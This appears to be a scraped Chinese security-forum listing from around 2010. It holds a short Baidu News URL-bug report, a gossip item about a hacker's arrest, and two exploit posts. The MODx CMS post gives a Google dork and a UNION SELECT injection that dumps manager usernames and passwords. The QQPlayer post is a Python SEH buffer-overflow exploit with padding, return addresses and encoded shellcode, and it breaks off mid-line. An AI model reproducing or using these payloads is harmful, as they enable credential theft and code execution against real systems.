【漏洞】百度新闻url处理bug 可引发漏洞

昨天浏览新闻时,在百度新闻发现如下缺陷: 正常页面: http://news.baidu.com/n?cmd=2&class=civilnews&page=http://cqqj.cqnews.net/qjxwzx/qjzhxw/201007/t20100727_4497301.htm&cls=civilnews   Bug页面(在url后提交“%23”即Url编码(十六进制)的“#”号): http://news.baidu.com/n?cmd=2&class=civilnews&page=http://cqqj.cqnews.net/qjxwzx/qjzhxw/201007/t20100727_4497301.htm%23&cls=civilnews 效果:会产

【事件】围观马骏被抓,事情很严重,狂笑不语

期初原因 搞了一个鸡巴漏洞,去日政府站装逼,装逼装大了。 哈哈哈哈哈,狂笑不语。某人经典一句:你们这是自寻死路! ---------------------------------------------------------------------------------------------------- http://hi.baidu.com/%B3%A4%BD%AD%D0%A1%C6%DF/blog/item/a76713ca482ea04bf31fe7ec.html 某牛悲剧了。。。被抓了.。。

最有前途的开源CMS SQL注入漏洞

# Exploit Title: Most Promising Open Source CMS SQL Injection Vulnerability           # Date: 25/07/2010                            # Author: lucifer          # Software Link: http://modxcms.com// # Version: 0.9.6.3 # Google dork :inurl:"index.php?id=null&parent=null" # Platform / Tested on: windows # Category: Expliot code # Code : [SQL] #BUG:################################################################# After find plugin at sites run SQL Inject : example : http://site.com/index.php?id=null&parent=null and 1=2 union select concat(0x7e,username,0x7e,password,0x7e) from modx_manager_users ###################################################################### Website : http://hi.baidu.com/bylucifer ######################################################################

【Exp】QQPlayer CUE文件缓冲区溢出漏洞

#!/usr/bin/env python   ################################################################# # # Title: QQPlayer cue File Buffer Overflow Exploit # Author: Lufeng Li of Neusoft Corporation # Vendor: [url]www.qq.com[/url] # Platform: Windows XPSP3 Chinese Simplified # Tested: QQPlayer 2.3.696.400 # Vulnerable: QQPlayer<=2.3.696.400p1 # ################################################################# # Code :   head = '''FILE "''' junk = "A" * 780 nseh ="\x42\x61\x21\x61" seh  ="\xa9\x9e\x41\x00" adjust="\x32\x42\x61\x33\xca\x83\xc0\x10" shellcode=("hffffk4diFkTpj02Tpk0T0AuEE2C4s4o0t0w174t0c7L0T0V7L2z1l131o2q1k2D1l081o"            "0v1o0a7O2r0T3w3e1P0a7o0a3Y3K0l3w038N5L0c5p8K354q2j8N5O00PYVTX10X41PZ41"            "H4A4I1TA71TADVTZ32PZNBFZDQC02DQD0D13DJE2C5CJO1E0G1I4T1R2M0T1V7L1TKL2CK"            "NK0KN2EKL08KN1FKO1Q7LML2N3W46607K7N684H310I9W025DOL1S905A4D802Z5DOO01") junk_="R"*8000 foot ='''.avi" VIDEO'''+"\x0a"'''TRACK 02 MODE1/8888'''+"\x0a"+"INDEX 08